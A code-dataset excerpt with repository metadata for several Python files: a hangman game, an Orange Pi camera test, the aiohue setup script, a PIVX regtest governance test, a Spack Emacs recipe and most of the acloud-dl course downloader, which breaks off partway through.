Dataset schema (one record per source file):

| Column | Type | Length / value range |
|---|---|---|
| hexsha | string | length 40 |
| size | int64 | 3 to 1.03M |
| ext | string | 10 classes |
| lang | string | 1 class |
| max_stars_repo_path | string | length 3 to 972 |
| max_stars_repo_name | string | length 6 to 130 |
| max_stars_repo_head_hexsha | string | length 40 to 78 |
| max_stars_repo_licenses | list | length 1 to 10 |
| max_stars_count | int64 (nullable) | 1 to 191k |
| max_stars_repo_stars_event_min_datetime | string (nullable) | length 24 |
| max_stars_repo_stars_event_max_datetime | string (nullable) | length 24 |
| max_issues_repo_path | string | length 3 to 972 |
| max_issues_repo_name | string | length 6 to 130 |
| max_issues_repo_head_hexsha | string | length 40 to 78 |
| max_issues_repo_licenses | list | length 1 to 10 |
| max_issues_count | int64 (nullable) | 1 to 116k |
| max_issues_repo_issues_event_min_datetime | string (nullable) | length 24 |
| max_issues_repo_issues_event_max_datetime | string (nullable) | length 24 |
| max_forks_repo_path | string | length 3 to 972 |
| max_forks_repo_name | string | length 6 to 130 |
| max_forks_repo_head_hexsha | string | length 40 to 78 |
| max_forks_repo_licenses | list | length 1 to 10 |
| max_forks_count | int64 (nullable) | 1 to 105k |
| max_forks_repo_forks_event_min_datetime | string (nullable) | length 24 |
| max_forks_repo_forks_event_max_datetime | string (nullable) | length 24 |
| content | string | length 3 to 1.03M |
| avg_line_length | float64 | 1.13 to 941k |
| max_line_length | int64 | 2 to 941k |
| alphanum_fraction | float64 | 0 to 1 |
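The records below follow this schema: each one carries repository metadata plus the raw file text in the `content` column. As an illustration only, a dataset shaped like this could be streamed and inspected with the Hugging Face `datasets` library; the sketch below is hedged, and the dataset identifier in it is a placeholder rather than the real name of this dataset.

```python
# Minimal sketch, assuming a Hugging Face-hosted dataset with the schema above.
# "some-org/python-code-subset" is a placeholder identifier, not a real dataset.
from datasets import load_dataset

ds = load_dataset("some-org/python-code-subset", split="train", streaming=True)

for row in ds.take(2):
    # Repository and popularity metadata for the file ...
    print(row["max_stars_repo_name"], row["max_stars_repo_path"], row["max_stars_count"])
    # ... followed by the first part of the raw file text.
    print(row["content"][:200])
```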

hexsha: 3fac10f2bdcd4b7a618ca11ab49572dc143b26f3 | size: 2,050 | ext: py | lang: Python
repo path: hangman/game.py | repo name: leonracsis/itp-u4-c2-hangman-game | head_hexsha: 99b7d225f27f779c9ee114223c719ab569e76075 | licenses: ["MIT"] (same across the max_stars/max_issues/max_forks columns)
max_stars_count: null | max_issues_count: null | max_forks_count: null | star/issue/fork event datetimes: null
content:
from .exceptions import *
import random
# Complete with your own, just for fun :)
LIST_OF_WORDS = []
def _get_random_word(list_of_words):
if not list_of_words:
raise InvalidListOfWordsException("Invalid List of Words")
return random.choice(list_of_words)
def _mask_word(word):
if not word:
raise InvalidWordException("Invalid Words")
return '*'*len(word)
def _uncover_word(answer_word, masked_word, character):
if not answer_word or not masked_word or len(answer_word) != len(masked_word):
raise InvalidWordException("Invalid Words")
if len(character) > 1:
raise InvalidGuessedLetterException("Only one letter to guess")
result_str=''
for idx, letter in enumerate(answer_word):
if character.lower() ==letter.lower():
result_str+=answer_word[idx].lower()
else:
result_str+=masked_word[idx].lower()
return result_str
def guess_letter(game, letter):
if game['masked_word']==game['answer_word']:
raise GameFinishedException("You Win")
if game['remaining_misses']==0:
raise GameFinishedException()
new_masked =_uncover_word(game['answer_word'], game['masked_word'],letter)
if new_masked ==game['answer_word']:
game['masked_word']=new_masked
raise GameWonException("You Win")
if game['masked_word']==new_masked:
game['remaining_misses'] -= 1
else:
game['masked_word']=new_masked
game['previous_guesses'] += letter.lower()
if game['remaining_misses']==0:
raise GameLostException()
def start_new_game(list_of_words=None, number_of_guesses=5):
if list_of_words is None:
list_of_words = LIST_OF_WORDS
word_to_guess = _get_random_word(list_of_words)
masked_word = _mask_word(word_to_guess)
game = {
'answer_word': word_to_guess,
'masked_word': masked_word,
'previous_guesses': [],
'remaining_misses': number_of_guesses,
}
return game

avg_line_length: 28.082192 | max_line_length: 82 | alphanum_fraction: 0.662439
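The record above is the `content` of hangman/game.py. Purely for orientation, the sketch below plays one hypothetical round against that module; the package layout (`hangman.game`, `hangman.exceptions`) is inferred from the file path and its star import, and the single-word list is made up.

```python
# Hypothetical usage of the hangman module in the record above; the word list is
# made up, and the exception name comes from the raise statements in that file.
from hangman.game import start_new_game, guess_letter
from hangman.exceptions import GameWonException

game = start_new_game(list_of_words=["python"], number_of_guesses=5)
try:
    for letter in "python":
        guess_letter(game, letter)  # each correct guess unmasks more of the word
except GameWonException:
    print("Won:", game["answer_word"], "| misses left:", game["remaining_misses"])
```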

hexsha: a435a0c9f61e09b94da41c9c8e31e6bb65e4f740 | size: 873 | ext: py | lang: Python
repo path: CameraTest.py | repo name: pinaxe1/OrangePI-One-Tensorflow | head_hexsha: fc5382b168a8007036ec02d63530663ad9f63063 | licenses: ["MIT"] (same across the max_stars/max_issues/max_forks columns)
max_stars_count: null | max_issues_count: null | max_forks_count: null | star/issue/fork event datetimes: null
content:
'''
The program expects the /dev/video1 device to be present; it is in turn created by v4l2loopback and receives its feed from vidcopy.
To activate the device, the following 7 commands should be performed on OrangePi Armbian:
sudo sunxi-pio -m "PG11<1><0><1><1>"
sudo modprobe gc2035
sudo modprobe vfe_v4l2
sleep 5
sudo modprobe v4l2loopback
cd ~/vidcopy
./vidcopy -w 800 -h 600 -r 30 -i /dev/video0 -o /dev/video1 -f UYVY
'''
import cv2
c = cv2.VideoCapture(1)
while True:
_,f = c.read()
cv2.imshow('Camera Orange Pi',f)
k = cv2.waitKey(5)
if k==1048603:
        # Esc key to stop; the key code may be 27 depending on your keyboard
break
elif k==-1:
continue
    # uncomment to print the code of the key pressed
#else:
    #print(k)
cv2.destroyAllWindows()

avg_line_length: 26.454545 | max_line_length: 119 | alphanum_fraction: 0.71134

hexsha: 70a42960e3d7d2d8c39b5723e1a04d49e20b347b | size: 91 | ext: py | lang: Python
repo path: src/pygame-demo/snek/core/colors.py | repo name: Adam-Jimenez/python-demo | head_hexsha: c1d222d88f62a5b6bfdfa01bbbc9e2fdce5a1d6b | licenses: ["MIT"] (same across the max_stars/max_issues/max_forks columns)
max_stars_count: null | max_issues_count: null | max_forks_count: null | star/issue/fork event datetimes: null
content:
COLORS = {
'white': (255, 255, 255),
'red': (255, 0, 0),
'black': (0, 0, 0),
}

avg_line_length: 15.166667 | max_line_length: 29 | alphanum_fraction: 0.395604

hexsha: 6d57dabc71759ad84ce3b23d8ff25205879e7af3 | size: 869 | ext: py | lang: Python
repo path: setup.py | repo name: spasche/aiohue | head_hexsha: 65798ed56f6f123a24a961ac87f604d79a221540 | licenses: ["Apache-2.0"] (same across the max_stars/max_issues/max_forks columns)
max_stars_count: null | max_issues_count: null | max_forks_count: null | star/issue/fork event datetimes: null
content:
from setuptools import setup, find_packages
long_description = open('README.md').read()
setup(
name='aiohue',
version='2.5.1',
license='Apache License 2.0',
url='https://github.com/home-assistant-libs/aiohue',
author='Paulus Schoutsen',
author_email='paulus@paulusschoutsen.nl',
description='Python module to talk to Philips Hue.',
long_description=long_description,
long_description_content_type='text/markdown',
packages=['aiohue'],
zip_safe=True,
platforms='any',
install_requires=list(val.strip() for val in open('requirements.txt')),
classifiers=[
'Intended Audience :: Developers',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Topic :: Software Development :: Libraries :: Python Modules'
]
)

avg_line_length: 31.035714 | max_line_length: 75 | alphanum_fraction: 0.669735

hexsha: b5159f160a8cb80cfb425d3198b06cfe05ef8c47 | size: 6,483 | ext: py | lang: Python
repo path: test/functional/tiertwo_governance_invalid_budget.py | repo name: PivxLiteDev/PivxLite | head_hexsha: 648d4a193b61b1996b41e9f6c6c468875c757cdd | licenses: ["MIT"] (same across the max_stars/max_issues/max_forks columns)
max_stars_count: null | max_issues_count: 3 (2020-02-06T10:15:07.000Z to 2022-01-13T00:08:49.000Z) | max_forks_count: 9 (2020-03-10T14:14:25.000Z to 2022-03-05T13:43:35.000Z)
content:
#!/usr/bin/env python3
# Copyright (c) 2021 The PIVX developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or https://www.opensource.org/licenses/mit-license.php.
from test_framework.test_framework import PivxlTestFramework
from test_framework.util import (
assert_equal,
p2p_port,
)
import os
import time
class GovernanceInvalidBudgetTest(PivxlTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
# 3 nodes:
# - 1 miner/mncontroller
# - 2 remote mns
self.num_nodes = 3
self.extra_args = [["-sporkkey=932HEevBSujW2ud7RfB1YF91AFygbBRQj3de3LyaCRqNzKKgWXi"],
[],
[],
]
self.enable_mocktime()
self.minerAPos = 0
self.remoteOnePos = 1
self.remoteTwoPos = 2
self.masternodeOneAlias = "mnOne"
self.masternodeTwoAlias = "mntwo"
self.mnOnePrivkey = "9247iC59poZmqBYt9iDh9wDam6v9S1rW5XekjLGyPnDhrDkP4AK"
self.mnTwoPrivkey = "92Hkebp3RHdDidGZ7ARgS4orxJAGyFUPDXNqtsYsiwho1HGVRbF"
def run_test(self):
self.minerA = self.nodes[self.minerAPos] # also controller of mn1 and mn2
self.mn1 = self.nodes[self.remoteOnePos]
self.mn2 = self.nodes[self.remoteTwoPos]
self.setupContext()
# Create a valid proposal and vote on it
next_superblock = self.minerA.getnextsuperblock()
payee = self.minerA.getnewaddress()
self.log.info("Creating a proposal to be paid at block %d" % next_superblock)
proposalFeeTxId = self.minerA.preparebudget("test1", "https://test1.org", 2,
next_superblock, payee, 300)
self.stake_and_ping(self.minerAPos, 3, [self.mn1, self.mn2])
proposalHash = self.minerA.submitbudget("test1", "https://test1.org", 2,
next_superblock, payee, 300, proposalFeeTxId)
time.sleep(1)
self.stake_and_ping(self.minerAPos, 7, [self.mn1, self.mn2])
self.log.info("Vote for the proposal and check projection...")
self.minerA.mnbudgetvote("alias", proposalHash, "yes", self.masternodeOneAlias)
self.minerA.mnbudgetvote("alias", proposalHash, "yes", self.masternodeTwoAlias)
time.sleep(1)
self.stake_and_ping(self.minerAPos, 1, [self.mn1, self.mn2])
projection = self.mn1.getbudgetprojection()[0]
assert_equal(projection["Name"], "test1")
assert_equal(projection["Hash"], proposalHash)
assert_equal(projection["Yeas"], 2)
        # Try to create an invalid finalized budget, paying to a nonexistent proposal
self.log.info("Creating invalid budget finalization...")
self.stake_and_ping(self.minerAPos, 5, [self.mn1, self.mn2])
budgetname = "invalid finalization"
blockstart = self.minerA.getnextsuperblock()
proposals = []
badPropId = "aa0061d705de36385c37701e7632408bd9d2876626b1299a17f7dc818c0ad285"
badPropPayee = "8c988f1a4a4de2161e0f50aac7f17e7f9555caa4"
badPropAmount = 500
proposals.append({"proposalid": badPropId, "payee": badPropPayee, "amount": badPropAmount})
res = self.minerA.createrawmnfinalbudget(budgetname, blockstart, proposals)
assert(res["result"] == "tx_fee_sent")
feeBudgetId = res["id"]
time.sleep(1)
self.stake_and_ping(self.minerAPos, 4, [self.mn1, self.mn2])
res = self.minerA.createrawmnfinalbudget(budgetname, blockstart, proposals, feeBudgetId)
assert(res["result"] == "error") # not accepted
self.log.info("Good, invalid budget not accepted.")
def send_3_pings(self, mn_list):
self.advance_mocktime(30)
self.send_pings(mn_list)
self.stake_and_ping(self.minerAPos, 1, mn_list)
self.advance_mocktime(30)
self.send_pings(mn_list)
time.sleep(2)
def setupContext(self):
# First mine 250 PoW blocks (250 with minerA)
self.log.info("Generating 259 blocks...")
for _ in range(250):
self.mocktime = self.generate_pow(self.minerAPos, self.mocktime)
self.sync_blocks()
# Then stake 9 blocks with minerA
self.stake_and_ping(self.minerAPos, 9, [])
for n in self.nodes:
assert_equal(n.getblockcount(), 259)
# Setup Masternodes
self.log.info("Masternodes setup...")
ownerdir = os.path.join(self.options.tmpdir, "node%d" % self.minerAPos, "regtest")
self.mnOneCollateral = self.setupMasternode(self.minerA, self.minerA, self.masternodeOneAlias,
ownerdir, self.remoteOnePos, self.mnOnePrivkey)
self.mnTwoCollateral = self.setupMasternode(self.minerA, self.minerA, self.masternodeTwoAlias,
ownerdir, self.remoteTwoPos, self.mnTwoPrivkey)
# Activate masternodes
self.log.info("Masternodes activation...")
self.stake_and_ping(self.minerAPos, 1, [])
time.sleep(3)
self.advance_mocktime(10)
remoteOnePort = p2p_port(self.remoteOnePos)
remoteTwoPort = p2p_port(self.remoteTwoPos)
self.mn1.initmasternode(self.mnOnePrivkey, "127.0.0.1:"+str(remoteOnePort))
self.mn2.initmasternode(self.mnTwoPrivkey, "127.0.0.1:"+str(remoteTwoPort))
self.stake_and_ping(self.minerAPos, 1, [])
self.wait_until_mnsync_finished()
self.controller_start_masternode(self.minerA, self.masternodeOneAlias)
self.controller_start_masternode(self.minerA, self.masternodeTwoAlias)
self.wait_until_mn_preenabled(self.mnOneCollateral.hash, 40)
        self.wait_until_mn_preenabled(self.mnTwoCollateral.hash, 40)
self.send_3_pings([self.mn1, self.mn2])
self.wait_until_mn_enabled(self.mnOneCollateral.hash, 120, [self.mn1, self.mn2])
        self.wait_until_mn_enabled(self.mnTwoCollateral.hash, 120, [self.mn1, self.mn2])
# activate sporks
self.log.info("Masternodes enabled. Activating sporks.")
self.activate_spork(self.minerAPos, "SPORK_8_MASTERNODE_PAYMENT_ENFORCEMENT")
self.activate_spork(self.minerAPos, "SPORK_9_MASTERNODE_BUDGET_ENFORCEMENT")
self.activate_spork(self.minerAPos, "SPORK_13_ENABLE_SUPERBLOCKS")
if __name__ == '__main__':
GovernanceInvalidBudgetTest().main()

avg_line_length: 45.65493 | max_line_length: 102 | alphanum_fraction: 0.660651

hexsha: 393def5cc5f85611b7a3a548753abfd8dc1919ec | size: 2,974 | ext: py | lang: Python
repo path: var/spack/repos/builtin/packages/emacs/package.py | repo name: robertodr/spack | head_hexsha: 9b809e01b47d48f01b3d257912fe1b752943cd3d | licenses: ["ECL-2.0", "Apache-2.0", "MIT-0", "MIT"] (same across the max_stars/max_issues/max_forks columns)
max_stars_count: 1 (2021-07-03T22:53:51.000Z to 2021-07-03T22:53:51.000Z) | max_issues_count: 1 (2021-03-23T17:08:14.000Z to 2021-04-01T17:18:22.000Z) | max_forks_count: 2 (2020-01-10T18:54:54.000Z to 2021-07-03T22:57:16.000Z)
content:
# Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
import sys
class Emacs(AutotoolsPackage, GNUMirrorPackage):
"""The Emacs programmable text editor."""
homepage = "https://www.gnu.org/software/emacs"
gnu_mirror_path = "emacs/emacs-24.5.tar.gz"
version('27.1', sha256='ffbfa61dc951b92cf31ebe3efc86c5a9d4411a1222b8a4ae6716cfd0e2a584db')
version('26.3', sha256='09c747e048137c99ed35747b012910b704e0974dde4db6696fde7054ce387591')
version('26.2', sha256='4f99e52a38a737556932cc57479e85c305a37a8038aaceb5156625caf102b4eb')
version('26.1', sha256='760382d5e8cdc5d0d079e8f754bce1136fbe1473be24bb885669b0e38fc56aa3')
version('25.3', sha256='f72c6a1b48b6fbaca2b991eed801964a208a2f8686c70940013db26cd37983c9')
version('25.2', sha256='505bbd6ea6c197947001d0f80bfccb6b30e1add584d6376f54d4fd6e4de72d2d')
version('25.1', sha256='763344b90db4d40e9fe90c5d14748a9dbd201ce544e2cf0835ab48a0aa4a1c67')
version('24.5', sha256='2737a6622fb2d9982e9c47fb6f2fb297bda42674e09db40fc9bcc0db4297c3b6')
variant('X', default=False, description="Enable an X toolkit")
variant(
'toolkit',
default='gtk',
values=('gtk', 'athena'),
description="Select an X toolkit (gtk, athena)"
)
variant('tls', default=False, description="Build Emacs with gnutls")
depends_on('pkgconfig', type='build')
depends_on('ncurses')
depends_on('pcre')
depends_on('zlib')
depends_on('libxml2')
depends_on('libtiff', when='+X')
depends_on('libpng', when='+X')
depends_on('libxpm', when='+X')
depends_on('giflib', when='+X')
depends_on('libx11', when='+X')
depends_on('libxaw', when='+X toolkit=athena')
depends_on('gtkplus', when='+X toolkit=gtk')
depends_on('gnutls', when='+tls')
depends_on('jpeg')
conflicts('@:26.3', when='platform=darwin os=catalina')
@when('platform=darwin')
def setup_build_environment(self, env):
        # on macOS, emacs' config does not search hard enough for ncurses'
        # termlib `-ltinfo` lib, which results in linker errors
if '+termlib' in self.spec['ncurses']:
env.append_flags('LDFLAGS', '-ltinfo')
def configure_args(self):
spec = self.spec
toolkit = spec.variants['toolkit'].value
if '+X' in spec:
args = [
'--with-x',
'--with-x-toolkit={0}'.format(toolkit)
]
else:
args = ['--without-x']
# On OS X/macOS, do not build "nextstep/Emacs.app", because
# doing so throws an error at build-time
if sys.platform == 'darwin':
args.append('--without-ns')
if '+tls' in spec:
args.append('--with-gnutls')
else:
args.append('--without-gnutls')
return args

avg_line_length: 35.831325 | max_line_length: 94 | alphanum_fraction: 0.662744

hexsha: b88a9d298f7666f29844056e86e393e4c4925d38 | size: 21,957 | ext: py | lang: Python
repo path: acloud-dl.py | repo name: affansyed/acloud-dl | head_hexsha: dcf350c2e9e22466a128e89b5758bdc2bb982ff1 | licenses: ["MIT"] (same across the max_stars/max_issues/max_forks columns)
max_stars_count: null | max_issues_count: null | max_forks_count: 1 (2021-12-07T15:19:28.000Z to 2021-12-07T15:19:28.000Z)
content:
#!/usr/bin/python3
# -*- coding: utf-8 -*-
# pylint: disable=E,C,W,R
import os
import sys
import time
import acloud
import argparse
from acloud import __version__
from acloud._colorized import *
from acloud._getpass import GetPass
from acloud._vtt2srt import WebVtt2Srt
from acloud._progress import ProgressBar
from acloud._colorized.banner import banner
getpass = GetPass()
class CloudGuru(WebVtt2Srt, ProgressBar, GetPass):
def __init__(self, cookies=''):
self.cookies = cookies
super(CloudGuru, self).__init__()
@staticmethod
def courses_not_downloaded(coursesList, path="", isFiltering=False):
if not isFiltering or path == "":
return coursesList
res = list()
downloaded_courses = os.listdir(path)
for course in coursesList:
cr_name = '{}'.format(course)
if cr_name in downloaded_courses:
continue
res.append(course)
return res
def courses_downloaded(self, path='', download_all=False, download_only_new=False):
sys.stdout.write('\033[2K\033[1G\r\r' + fc + sd + "[" + fm + sb + "*" + fc + sd + "] : " + fg + sb +
"Downloading accessible courses information .. \r")
courses = self.courses_not_downloaded(acloud.courses(cookies=self.cookies), path, download_only_new)
if not download_all:
sys.stdout.write('\033[2K\033[1G\r\r' + fc + sd + "[" + fm + sb + "*" + fc + sd + "] : " + fg + sb +
"Downloading accessible courses information .. (done)\r\n")
counter = 1
for course in courses:
title = course.title
sys.stdout.write(fc + sd + "[" + fm + sb + "%s" % counter + fc + sd + "] : " + fg + sb + "%s\n" % title)
counter += 1
question = fc + sd + "[" + fw + sb + "?" + fc + sd + "] : " + fy + sb + "select course number or range (1/%s/range): " % (len(courses)) + fg + sb
ask_user = self._getuser(prompt=question)
# setting default to download all if no user input is provided
if ask_user and ask_user[-1] == '+':
course_number = int(ask_user.split('+')[0])
if 0 < course_number <= len(courses):
course_number = course_number - 1
courses = courses[course_number:len(courses)]
elif ask_user and ask_user[-1] != "+":
course_number = int(ask_user)
if 0 < course_number <= len(courses):
course_number = course_number - 1
courses = [courses[course_number]]
else:
download_all = True
for course in courses:
course_name = course.title
sys.stdout.write(
"\n" + fc + sd + "[" + fm + sb + "*" + fc + sd + "] : " + fg + sb + "Course " + fb + sb + "'%s'.\n" % course_name)
sys.stdout.write(
'\033[2K\033[1G\r\r' + fc + sd + "[" + fm + sb + "*" + fc + sd + "] : " + fg + sb + "Downloading course information .. \r")
course = course.get_course(keep_alive=download_all)
sys.stdout.write(
'\033[2K\033[1G\r\r' + fc + sd + "[" + fm + sb + "*" + fc + sd + "] : " + fg + sb + "Downloaded course information .. (done)\r\n")
chapters = course.get_chapters()
total_lectures = course.lectures
total_chapters = course.chapters
sys.stdout.write(
fc + sd + "[" + fm + sb + "+" + fc + sd + "] : " + fg + sd + "Chapter(s) (%s).\n" % total_chapters)
sys.stdout.write(
fc + sd + "[" + fm + sb + "*" + fc + sd + "] : " + fg + sd + "Lecture(s) (%s).\n" % total_lectures)
for chapter in chapters:
chapter_title = chapter.title
lectures = chapter.get_lectures()
lectures_count = chapter.lectures
sys.stdout.write(
'\n' + fc + sd + "[" + fw + sb + "+" + fc + sd + "] : " + fw + sd + "Chapter (%s)\n" % chapter_title)
sys.stdout.write(
fc + sd + "[" + fm + sb + "*" + fc + sd + "] : " + fg + sd + "Lecture(s) (%s).\n" % lectures_count)
for lecture in lectures:
lecture_id = lecture.id
lecture_best = lecture.getbest()
lecture_streams = lecture.streams
lecture_assets = lecture.assets
if lecture_streams:
sys.stdout.write(fc + sd + " - " + fy + sb + "duration : " + fm + sb + str(
lecture.duration) + fy + sb + ".\n")
sys.stdout.write(fc + sd + " - " + fy + sb + "Lecture id : " + fm + sb + str(
lecture_id) + fy + sb + ".\n")
for stream in lecture_streams:
content_length = stream.get_filesize()
if content_length != 0:
if content_length <= 1048576.00:
size = round(float(content_length) / 1024.00, 2)
sz = format(size if size < 1024.00 else size / 1024.00, '.2f')
in_megabytes = 'KB' if size < 1024.00 else 'MB'
else:
size = round(float(content_length) / 1048576, 2)
sz = format(size if size < 1024.00 else size / 1024.00, '.2f')
in_megabytes = "MB " if size < 1024.00 else 'GB '
if lecture_best.dimention[1] == stream.dimention[1]:
in_megabytes = in_megabytes + fc + sb + "(Best)" + fg + sd
sys.stdout.write('\t- ' + fg + sd + "{:<23} {:<8}{}{}{}{}\n".format(str(stream), str(
stream.dimention[1]) + 'p', sz, in_megabytes, fy, sb))
time.sleep(0.5)
if lecture_assets:
for asset in lecture_assets:
if asset.mediatype != 'external_link':
content_length = asset.get_filesize()
if content_length != 0:
if content_length <= 1048576.00:
size = round(float(content_length) / 1024.00, 2)
sz = format(size if size < 1024.00 else size / 1024.00, '.2f')
in_megabytes = 'KB' if size < 1024.00 else 'MB'
else:
size = round(float(content_length) / 1048576, 2)
sz = format(size if size < 1024.00 else size / 1024.00, '.2f')
in_megabytes = "MB " if size < 1024.00 else 'GB '
sys.stdout.write(
'\t- ' + fg + sd + "{:<23} {:<8}{}{}{}{}\n".format(str(asset), asset.extension,
sz, in_megabytes, fy, sb))
def download_subtitles(self, subtitle='', filepath=''):
if subtitle:
filename = "%s\\%s" % (filepath, subtitle.filename) if os.name == 'nt' else "%s/%s" % (
filepath, subtitle.filename)
try:
retval = subtitle.download(filepath=filepath, quiet=True)
except KeyboardInterrupt:
sys.stdout.write(fc + sd + "\n[" + fr + sb + "-" + fc + sd + "] : " + fr + sd + "User Interrupted..\n")
sys.exit(0)
else:
msg = retval.get('msg')
if msg == "download":
self.convert(filename=filename)
def download_assets(self, lecture_assets='', filepath=''):
if lecture_assets:
for assets in lecture_assets:
title = assets.filename
mediatype = assets.mediatype
if mediatype == "external_link":
assets.download(filepath=filepath, quiet=True, callback=self.show_progress)
else:
sys.stdout.write(
fc + sd + "\n[" + fm + sb + "*" + fc + sd + "] : " + fg + sd + "Downloading asset(s)\n")
sys.stdout.write(
fc + sd + "[" + fm + sb + "*" + fc + sd + "] : " + fg + sd + "Downloading (%s)\n" % title)
try:
retval = assets.download(filepath=filepath, quiet=True, callback=self.show_progress)
except KeyboardInterrupt:
sys.stdout.write(
fc + sd + "\n[" + fr + sb + "-" + fc + sd + "] : " + fr + sd + "User Interrupted..\n")
sys.exit(0)
else:
msg = retval.get('msg')
if msg == 'already downloaded':
sys.stdout.write(
fc + sd + "[" + fm + sb + "*" + fc + sd + "] : " + fg + sd + "Asset : '%s' " % title + fy + sb + "(already downloaded).\n")
elif msg == 'download':
sys.stdout.write(
fc + sd + "[" + fm + sb + "+" + fc + sd + "] : " + fg + sd + "Downloaded (%s)\n" % title)
else:
sys.stdout.write(
fc + sd + "[" + fm + sb + "*" + fc + sd + "] : " + fg + sd + "Asset : '%s' " % title + fc + sb + "(download skipped).\n")
sys.stdout.write(
fc + sd + "[" + fr + sb + "-" + fc + sd + "] : " + fr + sd + "{}\n".format(msg))
def download_lectures(self, lecture_best='', lecture_title='', inner_index='', lectures_count='', filepath='',
user_extension=''):
if lecture_best:
sys.stdout.write(
fc + sd + "\n[" + fm + sb + "*" + fc + sd + "] : " + fg + sd + "Lecture(s) : ({index} of {total})\n".format(
index=inner_index, total=lectures_count))
sys.stdout.write(
fc + sd + "[" + fm + sb + "*" + fc + sd + "] : " + fg + sd + "Downloading (%s)\n" % lecture_title)
try:
retval = lecture_best.download(filepath=filepath, quiet=True, user_extension=user_extension,
callback=self.show_progress)
except KeyboardInterrupt:
sys.stdout.write(fc + sd + "\n[" + fr + sb + "-" + fc + sd + "] : " + fr + sd + "User Interrupted..\n")
sys.exit(0)
msg = retval.get('msg')
if msg == 'already downloaded':
sys.stdout.write(
fc + sd + "[" + fm + sb + "*" + fc + sd + "] : " + fg + sd + "Lecture : '%s' " % lecture_title + fy + sb + "(already downloaded).\n")
elif msg == 'download':
sys.stdout.write(
fc + sd + "[" + fm + sb + "+" + fc + sd + "] : " + fg + sd + "Downloaded (%s)\n" % lecture_title)
else:
sys.stdout.write(
fc + sd + "[" + fm + sb + "*" + fc + sd + "] : " + fg + sd + "Lecture : '%s' " % lecture_title + fc + sb + "(download skipped).\n")
sys.stdout.write(fc + sd + "[" + fr + sb + "-" + fc + sd + "] : " + fr + sd + "{}\n".format(msg))
def download_lectures_only(self, lecture_best='', lecture_title='', inner_index='', lectures_count='',
lecture_assets='', lecture_subs='', filepath='', user_extension=''):
if lecture_best:
self.download_lectures(lecture_best=lecture_best, lecture_title=lecture_title, inner_index=inner_index,
lectures_count=lectures_count, filepath=filepath,
user_extension=user_extension)
if lecture_assets:
self.download_assets(lecture_assets=lecture_assets, filepath=filepath)
if lecture_subs:
self.download_subtitles(subtitle=lecture_subs, filepath=filepath)
def course_download(self, path='', quality='', user_extension='', download_all=False, download_only_new=False):
sys.stdout.write(
'\033[2K\033[1G\r\r' + fc + sd + "[" + fm + sb + "*" + fc + sd + "] : " + fg + sb + "Downloading accessible courses information .. \r")
courses = self.courses_not_downloaded(acloud.courses(cookies=self.cookies), path, download_only_new)
if not download_all:
sys.stdout.write(
'\033[2K\033[1G\r\r' + fc + sd + "[" + fm + sb + "*" + fc + sd + "] : " + fg + sb + "Downloading accessible courses information .. (done)\r\n")
counter = 1
for course in courses:
title = course.title
sys.stdout.write(fc + sd + "[" + fm + sb + "%s" % counter + fc + sd + "] : " + fg + sb + "%s\n" % title)
counter += 1
question = fc + sd + "[" + fw + sb + "?" + fc + sd + "] : " + fy + sb + "select course number or range (1/%s/range): " % (
len(courses)) + fg + sb
ask_user = self._getuser(prompt=question)
# setting default to download all if no user input is provided
if ask_user and ask_user[-1] == '+':
course_number = int(ask_user.split('+')[0])
if 0 < course_number <= len(courses):
course_number = course_number - 1
courses = courses[course_number:len(courses)]
elif ask_user and ask_user[-1] != "+":
course_number = int(ask_user)
if 0 < course_number <= len(courses):
course_number = course_number - 1
courses = [courses[course_number]]
else:
download_all = True
for course in courses:
course_name = course.title
sys.stdout.write(
"\n" + fc + sd + "[" + fm + sb + "*" + fc + sd + "] : " + fg + sb + "Course " + fb + sb + "'%s'.\n" % course_name)
sys.stdout.write(
'\033[2K\033[1G\r\r' + fc + sd + "[" + fm + sb + "*" + fc + sd + "] : " + fg + sb + "Downloading course information .. \r")
course = course.get_course(keep_alive=download_all)
sys.stdout.write(
'\033[2K\033[1G\r\r' + fc + sd + "[" + fm + sb + "*" + fc + sd + "] : " + fg + sb + "Downloaded course information .. (done)\r\n")
chapters = course.get_chapters()
total_lectures = course.lectures
total_chapters = course.chapters
sys.stdout.write(
fc + sd + "[" + fm + sb + "+" + fc + sd + "] : " + fg + sd + "Chapter(s) (%s).\n" % total_chapters)
sys.stdout.write(
fc + sd + "[" + fm + sb + "*" + fc + sd + "] : " + fg + sd + "Lecture(s) (%s).\n" % total_lectures)
if path:
if '~' in path:
path = os.path.expanduser(path)
course_path = "%s\\%s" % (path, course_name) if os.name == 'nt' else "%s/%s" % (path, course_name)
else:
path = os.getcwd()
course_path = "%s\\%s" % (path, course_name) if os.name == 'nt' else "%s/%s" % (path, course_name)
for chapter in chapters:
chapter_index = chapter.index
chapter_title = chapter.title
lectures = chapter.get_lectures()
lectures_count = chapter.lectures
filepath = "%s\\%s" % (course_path, chapter_title) if os.name == 'nt' else "%s/%s" % (
course_path, chapter_title)
_ = course.create_chapter(filepath=filepath)
sys.stdout.write(
fc + sd + "\n[" + fm + sb + "*" + fc + sd + "] : " + fm + sb + "Downloading chapter : ({index} of {total})\n".format(
index=chapter_index, total=total_chapters))
sys.stdout.write(
fc + sd + "[" + fw + sb + "+" + fc + sd + "] : " + fw + sd + "Chapter (%s)\n" % chapter_title)
sys.stdout.write(
fc + sd + "[" + fm + sb + "*" + fc + sd + "] : " + fg + sd + "Found (%s) lectures ...\n" % lectures_count)
for lecture in lectures:
lecture_index = lecture.index
lecture_title = lecture.title
lecture_best = lecture.getbest()
lecture_streams = lecture.streams
lecture_assets = lecture.assets
lecture_subs = lecture.subtitle
lecture_best = lecture.get_quality(best_quality=lecture_best, streams=lecture_streams,
requested=quality)
self.download_lectures_only(lecture_best=lecture_best, lecture_title=lecture_title,
inner_index=lecture_index, lectures_count=lectures_count,
lecture_assets=lecture_assets, lecture_subs=lecture_subs,
filepath=filepath, user_extension=user_extension)
def main():
sys.stdout.write(banner())
version = "%(prog)s {version}".format(version=__version__)
description = 'A cross-platform python based utility to download courses from acloud.guru for personal offline use.'
parser = argparse.ArgumentParser(description=description, conflict_handler="resolve")
general = parser.add_argument_group("General")
general.add_argument(
'-h', '--help',
action='help',
help="Shows the help.")
general.add_argument(
'-v', '--version',
action='version',
version=version,
help="Shows the version.")
authentication = parser.add_argument_group("Authentication")
authentication.add_argument(
